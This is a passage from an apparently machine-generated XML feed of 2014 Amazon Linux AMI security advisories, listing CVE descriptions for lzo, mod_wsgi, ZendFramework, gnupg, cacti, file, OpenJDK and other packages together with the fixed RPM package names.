release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php55-cli-5.5.14-1.75.amzn1.i686.rpm</filename></package><package name="php55-process" version="5.5.14" release="1.75.amzn1" epoch="0" arch="i686"><filename>Packages/php55-process-5.5.14-1.75.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-373</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-373: medium priority package update for lzo</title><issued date="2014-07-09 16:45:00" /><updated date="2014-09-19 10:36:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-4607:
An integer overflow flaw was found in the way the lzo library decompressed
certain archives compressed with the LZO algorithm. An attacker could
create a specially crafted LZO-compressed input that, when decompressed by
an application using the lzo library, would cause that application to crash
or, potentially, execute arbitrary code. (CVE-2014-4607)
1112418:
CVE-2014-4607 lzo: lzo1x_decompress_safe() integer overflow
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4607" title="" id="CVE-2014-4607" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="lzo-debuginfo" version="2.08" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/lzo-debuginfo-2.08-1.5.amzn1.x86_64.rpm</filename></package><package name="lzo-devel" version="2.08" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/lzo-devel-2.08-1.5.amzn1.x86_64.rpm</filename></package><package name="lzo-minilzo" version="2.08" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/lzo-minilzo-2.08-1.5.amzn1.x86_64.rpm</filename></package><package name="lzo" version="2.08" release="1.5.amzn1" epoch="0" arch="x86_64"><filename>Packages/lzo-2.08-1.5.amzn1.x86_64.rpm</filename></package><package name="lzo-minilzo" version="2.08" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/lzo-minilzo-2.08-1.5.amzn1.i686.rpm</filename></package><package name="lzo" version="2.08" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/lzo-2.08-1.5.amzn1.i686.rpm</filename></package><package name="lzo-debuginfo" version="2.08" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/lzo-debuginfo-2.08-1.5.amzn1.i686.rpm</filename></package><package name="lzo-devel" version="2.08" release="1.5.amzn1" epoch="0" arch="i686"><filename>Packages/lzo-devel-2.08-1.5.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-374</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-374: low priority package update for python-simplejson</title><issued date="2014-07-09 16:51:00" /><updated date="2014-09-19 10:47:00" /><severity>low</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-4616:
1112285:
CVE-2014-4616 python: missing boundary check in JSON module
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4616" title="" id="CVE-2014-4616" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python-simplejson-debuginfo" version="3.5.3" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/python-simplejson-debuginfo-3.5.3-1.7.amzn1.x86_64.rpm</filename></package><package name="python-simplejson" version="3.5.3" release="1.7.amzn1" epoch="0" arch="x86_64"><filename>Packages/python-simplejson-3.5.3-1.7.amzn1.x86_64.rpm</filename></package><package name="python-simplejson-debuginfo" version="3.5.3" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/python-simplejson-debuginfo-3.5.3-1.7.amzn1.i686.rpm</filename></package><package name="python-simplejson" version="3.5.3" release="1.7.amzn1" epoch="0" arch="i686"><filename>Packages/python-simplejson-3.5.3-1.7.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-375</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-375: important priority package update for mod24_wsgi</title><issued date="2014-07-09 23:02:00" /><updated date="2014-09-19 10:37:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0242:
1101873:
CVE-2014-0242 mod_wsgi: information leak
CVE-2014-0240:
The mod_wsgi module before 3.5 for Apache, when daemon mode is enabled, does not properly handle error codes returned by setuid when run on certain Linux kernels, which allows local users to gain privileges via vectors related to the number of running processes.
1101863:
CVE-2014-0240 mod_wsgi: possible privilege escalation in setuid() failure scenarios
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0240" title="" id="CVE-2014-0240" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0242" title="" id="CVE-2014-0242" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod24_wsgi-py27" version="3.5" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_wsgi-py27-3.5-1.17.amzn1.x86_64.rpm</filename></package><package name="mod24_wsgi" version="3.5" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_wsgi-3.5-1.17.amzn1.x86_64.rpm</filename></package><package name="mod24_wsgi-debuginfo" version="3.5" release="1.17.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_wsgi-debuginfo-3.5-1.17.amzn1.x86_64.rpm</filename></package><package name="mod24_wsgi" version="3.5" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_wsgi-3.5-1.17.amzn1.i686.rpm</filename></package><package name="mod24_wsgi-debuginfo" version="3.5" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_wsgi-debuginfo-3.5-1.17.amzn1.i686.rpm</filename></package><package name="mod24_wsgi-py27" version="3.5" release="1.17.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_wsgi-py27-3.5-1.17.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-376</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-376: important priority package update for mod_wsgi</title><issued date="2014-07-09 23:07:00" /><updated date="2014-09-19 10:18:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-0242:
1101873:
CVE-2014-0242 mod_wsgi: information leak
CVE-2014-0240:
The mod_wsgi module before 3.5 for Apache, when daemon mode is enabled, does not properly handle error codes returned by setuid when run on certain Linux kernels, which allows local users to gain privileges via vectors related to the number of running processes.
1101863:
CVE-2014-0240 mod_wsgi: possible privilege escalation in setuid() failure scenarios
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0240" title="" id="CVE-2014-0240" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0242" title="" id="CVE-2014-0242" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod_wsgi-debuginfo" version="3.2" release="6.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_wsgi-debuginfo-3.2-6.8.amzn1.x86_64.rpm</filename></package><package name="mod_wsgi" version="3.2" release="6.8.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_wsgi-3.2-6.8.amzn1.x86_64.rpm</filename></package><package name="mod_wsgi-debuginfo" version="3.2" release="6.8.amzn1" epoch="0" arch="i686"><filename>Packages/mod_wsgi-debuginfo-3.2-6.8.amzn1.i686.rpm</filename></package><package name="mod_wsgi" version="3.2" release="6.8.amzn1" epoch="0" arch="i686"><filename>Packages/mod_wsgi-3.2-6.8.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-377</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-377: important priority package update for php-ZendFramework</title><issued date="2014-07-23 13:39:00" /><updated date="2014-09-19 10:49:00" /><severity>important</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-2685:
1081288:
CVE-2014-2684 CVE-2014-2685 php-ZendFramework: OpenID identity provider could be used to spoof other identity providers (ZF2014-02)
CVE-2014-2684:
1081288:
CVE-2014-2684 CVE-2014-2685 php-ZendFramework: OpenID identity provider could be used to spoof other identity providers (ZF2014-02)
CVE-2014-2683:
1081287:
CVE-2014-2681 CVE-2014-2682 CVE-2014-2683 php-ZendFramework: XML eXternal Entity (XXE) and XML Entity Expansion (XEE) flaws fixed in 1.12.4, 2.1.6, and 2.2.6 (ZF2014-01)
CVE-2014-2682:
1081287:
CVE-2014-2681 CVE-2014-2682 CVE-2014-2683 php-ZendFramework: XML eXternal Entity (XXE) and XML Entity Expansion (XEE) flaws fixed in 1.12.4, 2.1.6, and 2.2.6 (ZF2014-01)
CVE-2014-2681:
1081287:
CVE-2014-2681 CVE-2014-2682 CVE-2014-2683 php-ZendFramework: XML eXternal Entity (XXE) and XML Entity Expansion (XEE) flaws fixed in 1.12.4, 2.1.6, and 2.2.6 (ZF2014-01)
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2681" title="" id="CVE-2014-2681" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2682" title="" id="CVE-2014-2682" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2683" title="" id="CVE-2014-2683" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2684" title="" id="CVE-2014-2684" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2685" title="" id="CVE-2014-2685" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php-ZendFramework-Pdf" version="1.12.5" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Pdf-1.12.5-1.8.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Search-Lucene" version="1.12.5" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Search-Lucene-1.12.5-1.8.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Serializer-Adapter-Igbinary" version="1.12.5" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Serializer-Adapter-Igbinary-1.12.5-1.8.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Db-Adapter-Pdo-Pgsql" version="1.12.5" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Db-Adapter-Pdo-Pgsql-1.12.5-1.8.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Cache-Backend-Libmemcached" version="1.12.5" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Cache-Backend-Libmemcached-1.12.5-1.8.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework" version="1.12.5" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-1.12.5-1.8.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Db-Adapter-Pdo-Mssql" version="1.12.5" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Db-Adapter-Pdo-Mssql-1.12.5-1.8.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Services" version="1.12.5" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Services-1.12.5-1.8.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Captcha" version="1.12.5" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Captcha-1.12.5-1.8.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Db-Adapter-Pdo" version="1.12.5" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Db-Adapter-Pdo-1.12.5-1.8.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-extras" version="1.12.5" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-extras-1.12.5-1.8.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Ldap" version="1.12.5" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Ldap-1.12.5-1.8.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-full" version="1.12.5" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-full-1.12.5-1.8.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Auth-Adapter-Ldap" version="1.12.5" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Auth-Adapter-Ldap-1.12.5-1.8.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Cache-Backend-Memcached" version="1.12.5" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Cache-Backend-Memcached-1.12.5-1.8.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Soap" version="1.12.5" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Soap-1.12.5-1.8.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Feed" version="1.12.5" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Feed-1.12.5-1.8.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Db-Adapter-Pdo-Mysql" version="1.12.5" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Db-Adapter-Pdo-Mysql-1.12.5-1.8.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Dojo" version="1.12.5" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Dojo-1.12.5-1.8.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Cache-Backend-Apc" version="1.12.5" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Cache-Backend-Apc-1.12.5-1.8.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-demos" version="1.12.5" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-demos-1.12.5-1.8.amzn1.noarch.rpm</filename></package><package name="php-ZendFramework-Db-Adapter-Mysqli" version="1.12.5" release="1.8.amzn1" epoch="0" arch="noarch"><filename>Packages/php-ZendFramework-Db-Adapter-Mysqli-1.12.5-1.8.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-378</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-378: medium priority package update for gnupg</title><issued date="2014-07-23 13:50:00" /><updated date="2014-09-19 10:49:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-4617:
The do_uncompress function in g10/compress.c in GnuPG 1.x before 1.4.17 and 2.x before 2.0.24 allows context-dependent attackers to cause a denial of service (infinite loop) via malformed compressed packets, as demonstrated by an a3 01 5b ff byte sequence.
1112509:
CVE-2014-4617 gnupg: infinite loop when decompressing data packets
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4617" title="" id="CVE-2014-4617" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="gnupg-debuginfo" version="1.4.18" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnupg-debuginfo-1.4.18-1.25.amzn1.x86_64.rpm</filename></package><package name="gnupg" version="1.4.18" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnupg-1.4.18-1.25.amzn1.x86_64.rpm</filename></package><package name="gnupg" version="1.4.18" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/gnupg-1.4.18-1.25.amzn1.i686.rpm</filename></package><package name="gnupg-debuginfo" version="1.4.18" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/gnupg-debuginfo-1.4.18-1.25.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-379</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-379: medium priority package update for gnupg2</title><issued date="2014-07-23 13:51:00" /><updated date="2014-09-19 10:50:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-4617:
The do_uncompress function in g10/compress.c in GnuPG 1.x before 1.4.17 and 2.x before 2.0.24 allows context-dependent attackers to cause a denial of service (infinite loop) via malformed compressed packets, as demonstrated by an a3 01 5b ff byte sequence.
1112509:
CVE-2014-4617 gnupg: infinite loop when decompressing data packets
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4617" title="" id="CVE-2014-4617" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="gnupg2-smime" version="2.0.24" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnupg2-smime-2.0.24-1.25.amzn1.x86_64.rpm</filename></package><package name="gnupg2-debuginfo" version="2.0.24" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnupg2-debuginfo-2.0.24-1.25.amzn1.x86_64.rpm</filename></package><package name="gnupg2" version="2.0.24" release="1.25.amzn1" epoch="0" arch="x86_64"><filename>Packages/gnupg2-2.0.24-1.25.amzn1.x86_64.rpm</filename></package><package name="gnupg2" version="2.0.24" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/gnupg2-2.0.24-1.25.amzn1.i686.rpm</filename></package><package name="gnupg2-debuginfo" version="2.0.24" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/gnupg2-debuginfo-2.0.24-1.25.amzn1.i686.rpm</filename></package><package name="gnupg2-smime" version="2.0.24" release="1.25.amzn1" epoch="0" arch="i686"><filename>Packages/gnupg2-smime-2.0.24-1.25.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-380</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-380: medium priority package update for python27</title><issued date="2014-07-23 13:53:00" /><updated date="2014-09-19 10:51:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-4616:
1112285:
CVE-2014-4616 python: missing boundary check in JSON module
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4616" title="" id="CVE-2014-4616" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python27-tools" version="2.7.5" release="13.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-tools-2.7.5-13.35.amzn1.x86_64.rpm</filename></package><package name="python27-libs" version="2.7.5" release="13.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-libs-2.7.5-13.35.amzn1.x86_64.rpm</filename></package><package name="python27-test" version="2.7.5" release="13.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-test-2.7.5-13.35.amzn1.x86_64.rpm</filename></package><package name="python27" version="2.7.5" release="13.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-2.7.5-13.35.amzn1.x86_64.rpm</filename></package><package name="python27-devel" version="2.7.5" release="13.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-devel-2.7.5-13.35.amzn1.x86_64.rpm</filename></package><package name="python27-debuginfo" version="2.7.5" release="13.35.amzn1" epoch="0" arch="x86_64"><filename>Packages/python27-debuginfo-2.7.5-13.35.amzn1.x86_64.rpm</filename></package><package name="python27-tools" version="2.7.5" release="13.35.amzn1" epoch="0" arch="i686"><filename>Packages/python27-tools-2.7.5-13.35.amzn1.i686.rpm</filename></package><package name="python27" version="2.7.5" release="13.35.amzn1" epoch="0" arch="i686"><filename>Packages/python27-2.7.5-13.35.amzn1.i686.rpm</filename></package><package name="python27-test" version="2.7.5" release="13.35.amzn1" epoch="0" arch="i686"><filename>Packages/python27-test-2.7.5-13.35.amzn1.i686.rpm</filename></package><package name="python27-debuginfo" version="2.7.5" release="13.35.amzn1" epoch="0" arch="i686"><filename>Packages/python27-debuginfo-2.7.5-13.35.amzn1.i686.rpm</filename></package><package name="python27-libs" version="2.7.5" release="13.35.amzn1" epoch="0" arch="i686"><filename>Packages/python27-libs-2.7.5-13.35.amzn1.i686.rpm</filename></package><package name="python27-devel" version="2.7.5" release="13.35.amzn1" epoch="0" arch="i686"><filename>Packages/python27-devel-2.7.5-13.35.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-381</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-381: medium priority package update for cacti</title><issued date="2014-07-23 13:54:00" /><updated date="2014-09-19 10:50:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-4002:
Multiple cross-site scripting (XSS) vulnerabilities in Cacti 0.8.8b allow remote attackers to inject arbitrary web script or HTML via the (1) drp_action parameter to cdef.php, (2) data_input.php, (3) data_queries.php, (4) data_sources.php, (5) data_templates.php, (6) graph_templates.php, (7) graphs.php, (8) host.php, or (9) host_templates.php or the (10) graph_template_input_id or (11) graph_template_id parameter to graph_templates_inputs.php.
1113035:
CVE-2014-4002 cacti: Cross-Site Scripting Vulnerability
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-4002" title="" id="CVE-2014-4002" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="cacti" version="0.8.8b" release="7.5.amzn1" epoch="0" arch="noarch"><filename>Packages/cacti-0.8.8b-7.5.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-382</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-382: medium priority package update for file</title><issued date="2014-07-23 13:57:00" /><updated date="2014-09-19 15:57:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-3538:
file before 5.19 does not properly restrict the amount of data read during a regex search, which allows remote attackers to cause a denial of service (CPU consumption) via a crafted file that triggers backtracking during processing of an awk rule. NOTE: this vulnerability exists because of an incomplete fix for CVE-2013-7345.
1098222:
CVE-2014-3538 file: extensive backtracking in awk rule regular expression (incomplete fix for CVE-2013-7345)
CVE-2014-3487:
The cdf_read_property_info function in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, does not properly validate a stream offset, which allows remote attackers to cause a denial of service (application crash) via a crafted CDF file.
1107544:
CVE-2014-3487 file: cdf_read_property_info insufficient boundary check
CVE-2014-3480:
The cdf_count_chain function in cdf.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, does not properly validate sector-count data, which allows remote attackers to cause a denial of service (application crash) via a crafted CDF file.
1104858:
CVE-2014-3480 file: cdf_count_chain insufficient boundary check
CVE-2014-3479:
The cdf_check_stream_offset function in cdf.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, relies on incorrect sector-size data, which allows remote attackers to cause a denial of service (application crash) via a crafted stream offset in a CDF file.
1104869:
CVE-2014-3479 file: cdf_check_stream_offset insufficient boundary check
CVE-2014-3478:
Buffer overflow in the mconvert function in softmagic.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, allows remote attackers to cause a denial of service (application crash) via a crafted Pascal string in a FILE_PSTRING conversion.
1104863:
CVE-2014-3478 file: mconvert incorrect handling of truncated pascal string size
CVE-2014-0238:
The cdf_read_property_info function in cdf.c in the Fileinfo component in PHP before 5.4.29 and 5.5.x before 5.5.13 allows remote attackers to cause a denial of service (infinite loop or out-of-bounds memory access) via a vector that (1) has zero length or (2) is too long.
1098155:
CVE-2014-0238 file: CDF property info parsing nelements infinite loop
CVE-2014-0237:
The cdf_unpack_summary_info function in cdf.c in the Fileinfo component in PHP before 5.4.29 and 5.5.x before 5.5.13 allows remote attackers to cause a denial of service (performance degradation) by triggering many file_printf calls.
1098193:
CVE-2014-0237 file: cdf_unpack_summary_info() excessive looping DoS
CVE-2014-0207:
The cdf_read_short_sector function in cdf.c in file before 5.19, as used in the Fileinfo component in PHP before 5.4.30 and 5.5.x before 5.5.14, allows remote attackers to cause a denial of service (assertion failure and application exit) via a crafted CDF file.
1091842:
CVE-2014-0207 file: cdf_read_short_sector insufficient boundary check
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0207" title="" id="CVE-2014-0207" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0237" title="" id="CVE-2014-0237" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0238" title="" id="CVE-2014-0238" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3478" title="" id="CVE-2014-3478" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3479" title="" id="CVE-2014-3479" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3480" title="" id="CVE-2014-3480" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3487" title="" id="CVE-2014-3487" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3538" title="" id="CVE-2014-3538" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="python-magic" version="5.19" release="1.18.amzn1" epoch="0" arch="noarch"><filename>Packages/python-magic-5.19-1.18.amzn1.noarch.rpm</filename></package><package name="file" version="5.19" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-5.19-1.18.amzn1.x86_64.rpm</filename></package><package name="file-devel" version="5.19" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-devel-5.19-1.18.amzn1.x86_64.rpm</filename></package><package name="file-libs" version="5.19" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-libs-5.19-1.18.amzn1.x86_64.rpm</filename></package><package name="file-debuginfo" version="5.19" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-debuginfo-5.19-1.18.amzn1.x86_64.rpm</filename></package><package name="file-static" version="5.19" release="1.18.amzn1" epoch="0" arch="x86_64"><filename>Packages/file-static-5.19-1.18.amzn1.x86_64.rpm</filename></package><package name="file-devel" version="5.19" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/file-devel-5.19-1.18.amzn1.i686.rpm</filename></package><package name="file" version="5.19" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/file-5.19-1.18.amzn1.i686.rpm</filename></package><package name="file-static" version="5.19" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/file-static-5.19-1.18.amzn1.i686.rpm</filename></package><package name="file-debuginfo" version="5.19" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/file-debuginfo-5.19-1.18.amzn1.i686.rpm</filename></package><package name="file-libs" version="5.19" release="1.18.amzn1" epoch="0" arch="i686"><filename>Packages/file-libs-5.19-1.18.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-383</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-383: critical priority package update for java-1.7.0-openjdk</title><issued date="2014-07-23 14:01:00" /><updated date="2014-09-19 11:37:00" /><severity>critical</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-4266:
Multiple flaws were discovered in the JMX, Libraries, Security, and Serviceability components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-4263:
The Diffie-Hellman (DH) key exchange algorithm implementation in the Security component in OpenJDK failed to validate public DH parameters properly. This could cause OpenJDK to accept and use weak parameters, allowing an attacker to recover the negotiated key.
CVE-2014-4262:
Multiple improper permission check issues were discovered in the Libraries component in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2014-4252:
Multiple flaws were discovered in the JMX, Libraries, Security, and Serviceability components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-4244:
It was discovered that the RSA algorithm in the Security component in OpenJDK did not sufficiently perform blinding while performing operations that were using private keys. An attacker able to measure timing differences of those operations could possibly leak information about the used keys.
CVE-2014-4223:
Multiple improper permission check issues were discovered in the Libraries component in OpenJDK. An untrusted Java application or applet could use these flaws to bypass Java sandbox restrictions.
CVE-2014-4221:
Multiple flaws were discovered in the JMX, Libraries, Security, and Serviceability components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-4219:
It was discovered that the Hotspot component in OpenJDK did not properly verify bytecode from the class files. An untrusted Java application or applet could possibly use these flaws to bypass Java sandbox restrictions.
CVE-2014-4218:
Multiple flaws were discovered in the JMX, Libraries, Security, and Serviceability components in OpenJDK. An untrusted Java application or applet could use these flaws to bypass certain Java sandbox restrictions.
CVE-2014-4216:
It was discovered that the Hotspot component in OpenJDK did not properly verify bytecode from the class files. An untrusted Java application or applet could possibly use these flaws to bypass Java sandbox restrictions.
CVE-2014-4209:
